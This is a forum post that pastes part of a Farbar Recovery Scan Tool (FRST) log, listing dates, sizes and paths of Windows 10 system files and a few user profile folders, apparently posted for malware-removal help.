2016-09-30 06:31 - 2016-09-15 18:21 - 04136960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll
2016-09-30 06:31 - 2016-09-15 18:21 - 02800128 _____ (Microsoft Corporation) C:\WINDOWS\system32\netshell.dll
2016-09-30 06:31 - 2016-09-15 18:21 - 02208768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.3D.dll
2016-09-30 06:31 - 2016-09-15 18:21 - 00971264 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll
2016-09-30 06:31 - 2016-09-15 18:21 - 00674304 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2016-09-30 06:31 - 2016-09-15 18:20 - 06664192 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe
2016-09-30 06:31 - 2016-09-15 18:20 - 02914304 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2016-09-30 06:31 - 2016-09-15 18:20 - 02668544 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-09-30 06:31 - 2016-09-15 18:20 - 02476544 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2016-09-30 06:31 - 2016-09-15 18:20 - 02424320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Perception.dll
2016-09-30 06:31 - 2016-09-15 18:20 - 01779712 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-09-30 06:31 - 2016-09-15 18:20 - 01710080 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2016-09-30 06:31 - 2016-09-15 18:20 - 01275392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll
2016-09-30 06:31 - 2016-09-15 18:20 - 00765440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Sensors.dll
2016-09-30 06:31 - 2016-09-15 18:20 - 00691712 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsm.dll
2016-09-30 06:31 - 2016-09-15 18:19 - 03202048 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2016-09-30 06:31 - 2016-09-15 18:19 - 01840640 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2016-09-30 06:31 - 2016-09-15 18:19 - 01130496 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2016-09-30 06:31 - 2016-09-15 18:19 - 00832512 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2016-09-30 06:31 - 2016-09-15 18:19 - 00788992 _____ (Microsoft Corporation) C:\WINDOWS\system32\spoolsv.exe
2016-09-30 06:31 - 2016-09-15 18:19 - 00730112 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2016-09-30 06:31 - 2016-09-15 18:19 - 00716800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll
2016-09-30 06:31 - 2016-09-15 18:18 - 01369088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Phone.dll
2016-09-30 06:31 - 2016-09-15 18:18 - 00455168 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenrollengine.dll
2016-09-30 06:31 - 2016-09-15 18:17 - 01107456 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2016-09-30 06:31 - 2016-09-15 18:17 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\system32\enrollmentapi.dll
2016-09-30 06:31 - 2016-09-15 18:17 - 00122368 _____ (Microsoft Corporation) C:\WINDOWS\system32\FontProvider.dll
2016-09-30 06:31 - 2016-09-15 18:16 - 01817088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2016-09-30 06:31 - 2016-09-15 18:16 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2016-09-30 06:31 - 2016-09-15 18:16 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\spaceman.exe
2016-09-30 06:31 - 2016-08-06 05:34 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\smphost.dll
2016-09-30 06:31 - 2016-08-05 10:29 - 00568832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.UXRes.dll
2016-09-30 06:31 - 2016-08-05 10:29 - 00568832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.UXRes.dll
2016-09-30 06:30 - 2016-09-15 19:37 - 00590960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2016-09-30 06:30 - 2016-09-15 19:29 - 00424640 _____ (Microsoft Corporation) C:\WINDOWS\system32\ws2_32.dll
2016-09-30 06:30 - 2016-09-15 19:29 - 00169056 _____ (Microsoft Corporation) C:\WINDOWS\system32\skci.dll
2016-09-30 06:30 - 2016-09-15 19:29 - 00074080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vpci.sys
2016-09-30 06:30 - 2016-09-15 19:25 - 00280472 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdeunlock.exe
2016-09-30 06:30 - 2016-09-15 19:24 - 01182048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2016-09-30 06:30 - 2016-09-15 19:22 - 00433832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWanAPI.dll
2016-09-30 06:30 - 2016-09-15 19:21 - 00272720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wintrust.dll
2016-09-30 06:30 - 2016-09-15 19:18 - 06654616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-09-30 06:30 - 2016-09-15 19:15 - 00557408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys
2016-09-30 06:30 - 2016-09-15 19:15 - 00335712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
2016-09-30 06:30 - 2016-09-15 19:14 - 01415752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2016-09-30 06:30 - 2016-09-15 19:14 - 00435040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys
2016-09-30 06:30 - 2016-09-15 19:12 - 04131464 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2016-09-30 06:30 - 2016-09-15 19:12 - 01472536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll
2016-09-30 06:30 - 2016-09-15 19:11 - 22219328 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-09-30 06:30 - 2016-09-15 19:11 - 01990640 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2016-09-30 06:30 - 2016-09-15 19:11 - 01300600 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2016-09-30 06:30 - 2016-09-15 19:11 - 01071728 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll
2016-09-30 06:30 - 2016-09-15 19:11 - 01066104 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2016-09-30 06:30 - 2016-09-15 19:11 - 00862064 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfreadwrite.dll
2016-09-30 06:30 - 2016-09-15 19:11 - 00725664 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2016-09-30 06:30 - 2016-09-15 19:11 - 00241504 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2016-09-30 06:30 - 2016-09-15 19:11 - 00160096 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.dll
2016-09-30 06:30 - 2016-09-15 19:08 - 05683712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-09-30 06:30 - 2016-09-15 19:07 - 01572768 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2016-09-30 06:30 - 2016-09-15 19:07 - 01418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2016-09-30 06:30 - 2016-09-15 19:07 - 00128864 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmapi.dll
2016-09-30 06:30 - 2016-09-15 19:06 - 00372440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.MediaControl.dll
2016-09-30 06:30 - 2016-09-15 19:01 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Radios.dll
2016-09-30 06:30 - 2016-09-15 19:00 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2016-09-30 06:30 - 2016-09-15 18:59 - 00255488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\unimdm.tsp
2016-09-30 06:30 - 2016-09-15 18:59 - 00136192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinRtTracing.dll
2016-09-30 06:30 - 2016-09-15 18:59 - 00094208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryClient.dll
2016-09-30 06:30 - 2016-09-15 18:59 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.ServiceDiscovery.Dnssd.dll
2016-09-30 06:30 - 2016-09-15 18:58 - 00291840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Search.ProtocolHandler.MAPI2.dll
2016-09-30 06:30 - 2016-09-15 18:58 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovhost.dll
2016-09-30 06:30 - 2016-09-15 18:58 - 00184320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserMgrProxy.dll
2016-09-30 06:30 - 2016-09-15 18:58 - 00142336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFi.dll
2016-09-30 06:30 - 2016-09-15 18:58 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.SerialCommunication.dll
2016-09-30 06:30 - 2016-09-15 18:57 - 00392192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.Input.dll
2016-09-30 06:30 - 2016-09-15 18:57 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.XboxLive.Storage.dll
2016-09-30 06:30 - 2016-09-15 18:57 - 00182784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsensorgroup.dll
2016-09-30 06:30 - 2016-09-15 18:57 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ClipboardServer.dll
2016-09-30 06:30 - 2016-09-15 18:56 - 00609280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Import.dll
2016-09-30 06:30 - 2016-09-15 18:56 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2016-09-30 06:30 - 2016-09-15 18:56 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Core.dll
2016-09-30 06:30 - 2016-09-15 18:55 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.AllJoyn.dll
2016-09-30 06:30 - 2016-09-15 18:55 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\efswrt.dll
2016-09-30 06:30 - 2016-09-15 18:55 - 00386048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFiDirect.dll
2016-09-30 06:30 - 2016-09-15 18:55 - 00325120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll
2016-09-30 06:30 - 2016-09-15 18:55 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apprepsync.dll
2016-09-30 06:30 - 2016-09-15 18:55 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WwaApi.dll
2016-09-30 06:30 - 2016-09-15 18:55 - 00185856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Identity.Provider.dll
2016-09-30 06:30 - 2016-09-15 18:55 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apprepapi.dll
2016-09-30 06:30 - 2016-09-15 18:55 - 00114176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setupugc.exe
2016-09-30 06:30 - 2016-09-15 18:54 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll
2016-09-30 06:30 - 2016-09-15 18:54 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Picker.dll
2016-09-30 06:30 - 2016-09-15 18:53 - 00819200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppContracts.dll
2016-09-30 06:30 - 2016-09-15 18:53 - 00340480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2016-09-30 06:30 - 2016-09-15 18:52 - 00500224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.dll
2016-09-30 06:30 - 2016-09-15 18:52 - 00445952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprapi.dll
2016-09-30 06:30 - 2016-09-15 18:52 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2016-09-30 06:30 - 2016-09-15 18:51 - 00762368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprddm.dll
2016-09-30 06:30 - 2016-09-15 18:50 - 06474752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe
2016-09-30 06:30 - 2016-09-15 18:50 - 00071168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pwrshplugin.dll
2016-09-30 06:30 - 2016-09-15 18:49 - 00468992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.InkControls.dll
2016-09-30 06:30 - 2016-09-15 18:48 - 01320448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comsvcs.dll
2016-09-30 06:30 - 2016-09-15 18:46 - 00795648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MiracastReceiver.dll
2016-09-30 06:30 - 2016-09-15 18:46 - 00471552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.BackgroundMediaPlayback.dll
2016-09-30 06:30 - 2016-09-15 18:46 - 00343040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToDevice.dll
2016-09-30 06:30 - 2016-09-15 18:45 - 02749440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mispace.dll
2016-09-30 06:30 - 2016-09-15 18:45 - 00470016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Playback.BackgroundMediaPlayer.dll
2016-09-30 06:30 - 2016-09-15 18:45 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dialclient.dll
2016-09-30 06:30 - 2016-09-15 18:44 - 02153984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\storagewmi.dll
2016-09-30 06:30 - 2016-09-15 18:44 - 00459776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Playback.MediaPlayer.dll
2016-09-30 06:30 - 2016-09-15 18:44 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2016-09-30 06:30 - 2016-09-15 18:43 - 03520512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xpsrchvw.exe
2016-09-30 06:30 - 2016-09-15 18:43 - 03196416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdp.dll
2016-09-30 06:30 - 2016-09-15 18:43 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2016-09-30 06:30 - 2016-09-15 18:43 - 00220672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToReceiver.dll
2016-09-30 06:30 - 2016-09-15 18:43 - 00090112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2016-09-30 06:30 - 2016-09-15 18:43 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2016-09-30 06:30 - 2016-09-15 18:42 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BackgroundMediaPolicy.dll
2016-09-30 06:30 - 2016-09-15 18:41 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
2016-09-30 06:30 - 2016-09-15 18:41 - 00400384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll
2016-09-30 06:30 - 2016-09-15 18:41 - 00357376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Geolocation.dll
2016-09-30 06:30 - 2016-09-15 18:41 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\unimdm.tsp
2016-09-30 06:30 - 2016-09-15 18:40 - 03369984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepository.dll
2016-09-30 06:30 - 2016-09-15 18:40 - 02138112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2016-09-30 06:30 - 2016-09-15 18:40 - 02026496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2016-09-30 06:30 - 2016-09-15 18:40 - 01656320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Perception.dll
2016-09-30 06:30 - 2016-09-15 18:40 - 01247232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Globalization.dll
2016-09-30 06:30 - 2016-09-15 18:40 - 00467968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.XboxLive.Storage.dll
2016-09-30 06:30 - 2016-09-15 18:40 - 00395264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmenrollengine.dll
2016-09-30 06:30 - 2016-09-15 18:40 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Background.SystemEventsBroker.dll
2016-09-30 06:30 - 2016-09-15 18:40 - 00113664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.ServiceDiscovery.Dnssd.dll
2016-09-30 06:30 - 2016-09-15 18:40 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2016-09-30 06:30 - 2016-09-15 18:39 - 02682880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netshell.dll
2016-09-30 06:30 - 2016-09-15 18:39 - 01232384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Maps.dll
2016-09-30 06:30 - 2016-09-15 18:39 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Phone.dll
2016-09-30 06:30 - 2016-09-15 18:39 - 00873472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2016-09-30 06:30 - 2016-09-15 18:39 - 00566784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll
2016-09-30 06:30 - 2016-09-15 18:38 - 00620544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2016-09-30 06:30 - 2016-09-15 18:38 - 00427008 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmrdvcore.dll
2016-09-30 06:30 - 2016-09-15 18:38 - 00349696 _____ (Microsoft Corporation) C:\WINDOWS\system32\icsvcext.dll
2016-09-30 06:30 - 2016-09-15 18:38 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenance.dll
2016-09-30 06:30 - 2016-09-15 18:37 - 01507840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.FaceAnalysis.dll
2016-09-30 06:30 - 2016-09-15 18:37 - 00912384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SmartCards.dll
2016-09-30 06:30 - 2016-09-15 18:37 - 00651264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.AllJoyn.dll
2016-09-30 06:30 - 2016-09-15 18:37 - 00296448 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlancfg.dll
2016-09-30 06:30 - 2016-09-15 18:37 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.HostName.dll
2016-09-30 06:30 - 2016-09-15 18:37 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2016-09-30 06:30 - 2016-09-15 18:36 - 00448512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TpmCoreProvisioning.dll
2016-09-30 06:30 - 2016-09-15 18:36 - 00387584 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2016-09-30 06:30 - 2016-09-15 18:36 - 00358912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll
2016-09-30 06:30 - 2016-09-15 18:36 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll
2016-09-30 06:30 - 2016-09-15 18:35 - 00748544 _____ (Microsoft Corporation) C:\WINDOWS\system32\ChatApis.dll
2016-09-30 06:30 - 2016-09-15 18:35 - 00645120 _____ (Microsoft Corporation) C:\WINDOWS\system32\qedit.dll
2016-09-30 06:30 - 2016-09-15 18:35 - 00432640 _____ (Microsoft Corporation) C:\WINDOWS\system32\SndVolSSO.dll
2016-09-30 06:30 - 2016-09-15 18:35 - 00331776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SessEnv.dll
2016-09-30 06:30 - 2016-09-15 18:35 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\rshx32.dll
2016-09-30 06:30 - 2016-09-15 18:34 - 00642048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.InkControls.dll
2016-09-30 06:30 - 2016-09-15 18:33 - 06285312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-09-30 06:30 - 2016-09-15 18:33 - 01145344 _____ (Microsoft Corporation) C:\WINDOWS\system32\EmailApis.dll
2016-09-30 06:30 - 2016-09-15 18:33 - 00966144 _____ (Microsoft Corporation) C:\WINDOWS\system32\sbe.dll
2016-09-30 06:30 - 2016-09-15 18:33 - 00775168 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2016-09-30 06:30 - 2016-09-15 18:33 - 00560128 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2016-09-30 06:30 - 2016-09-15 18:31 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\system32\pwrshplugin.dll
2016-09-30 06:30 - 2016-09-15 18:30 - 03776512 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2016-09-30 06:30 - 2016-09-15 18:30 - 01403392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Editing.dll
2016-09-30 06:30 - 2016-09-15 18:30 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2016-09-30 06:30 - 2016-09-15 18:30 - 00169984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Energy.dll
2016-09-30 06:30 - 2016-09-15 18:29 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvecpl.dll
2016-09-30 06:30 - 2016-09-15 18:28 - 00442368 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToDevice.dll
2016-09-30 06:30 - 2016-09-15 18:28 - 00187904 _____ (Microsoft Corporation) C:\WINDOWS\system32\dialclient.dll
2016-09-30 06:30 - 2016-09-15 18:27 - 00796672 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvewiz.dll
2016-09-30 06:30 - 2016-09-15 18:27 - 00228352 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAC3ENC.DLL
2016-09-30 06:30 - 2016-09-15 18:25 - 01217024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll
2016-09-30 06:30 - 2016-09-15 18:24 - 04596224 _____ (Microsoft Corporation) C:\WINDOWS\system32\xpsrchvw.exe
2016-09-30 06:30 - 2016-09-15 18:24 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll
2016-09-30 06:30 - 2016-09-15 18:24 - 00538624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToManager.dll
2016-09-30 06:30 - 2016-09-15 18:24 - 00467456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Geolocation.dll
2016-09-30 06:30 - 2016-09-15 18:24 - 00139776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Devices.dll
2016-09-30 06:30 - 2016-09-15 18:23 - 01040896 _____ (Microsoft Corporation) C:\WINDOWS\system32\NaturalLanguage6.dll
2016-09-30 06:30 - 2016-09-15 18:23 - 00460800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Midi.dll
2016-09-30 06:30 - 2016-09-15 18:22 - 00911872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.dll
2016-09-30 06:30 - 2016-09-15 18:20 - 02688512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-09-30 06:30 - 2016-09-15 18:20 - 02095616 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2016-09-30 06:30 - 2016-09-15 18:20 - 01984512 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2016-09-30 06:30 - 2016-09-15 18:20 - 00875520 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2016-09-30 06:30 - 2016-09-15 18:20 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentApis.dll
2016-09-30 06:30 - 2016-09-15 18:19 - 03617792 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-09-30 06:30 - 2016-09-15 18:19 - 01424896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Maps.dll
2016-09-30 06:30 - 2016-09-15 18:19 - 01328128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Http.dll
2016-09-30 06:30 - 2016-09-15 18:19 - 01013760 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactApis.dll
2016-09-30 06:30 - 2016-09-15 18:19 - 00774656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.dll
2016-09-30 06:30 - 2016-09-15 18:18 - 00701952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Connectivity.dll
2016-09-30 06:30 - 2016-09-15 18:17 - 00924672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.BackgroundTransfer.dll
2016-09-30 06:30 - 2016-09-15 18:16 - 00998912 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2016-09-30 06:30 - 2016-09-15 18:16 - 00886784 _____ (Microsoft Corporation) C:\WINDOWS\system32\CPFilters.dll
2016-09-30 06:30 - 2016-09-15 18:16 - 00531456 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll
2016-09-30 06:30 - 2016-09-15 16:00 - 00445765 _____ C:\WINDOWS\system32\ApnDatabase.xml
2016-09-30 06:30 - 2016-08-06 05:33 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\smphost.dll
2016-09-27 15:30 - 2016-09-27 15:30 - 00000000 ____D C:\ProgramData\Microsoft OneDrive
2016-09-27 15:27 - 2016-09-28 06:07 - 00000000 ____D C:\Users\maikp\AppData\Local\ConnectedDevicesPlatform
2016-09-27 15:27 - 2016-09-27 15:27 - 00000656 __RSH C:\Users\maikp\ntuser.pol
2016-09-27 15:27 - 2016-09-27 15:27 - 00000020 ___SH C:\Users\maikp\ntuser.ini
2016-09-27 13:05 - 2016-09-27 12:24 - 00000000 ___DC C:\WINDOWS\Panther

RonnyP 19.10.2016 13:19
FRST 2/2

Code:
2016-09-27 13:02 - 2016-09-27 13:02 - 09260032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmploc.DLL
2016-09-27 13:02 - 2016-09-27 13:02 - 09260032 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmploc.DLL
2016-09-27 13:02 - 2016-09-27 13:02 - 06574592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanmm.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 05511680 _____ (Microsoft Corporation) C:\WINDOWS\system32\aclui.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 05398016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aclui.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 05384192 _____ (Microsoft) C:\WINDOWS\system32\dbgeng.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 04747776 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 04148224 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 03299328 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstsc.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 02852864 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
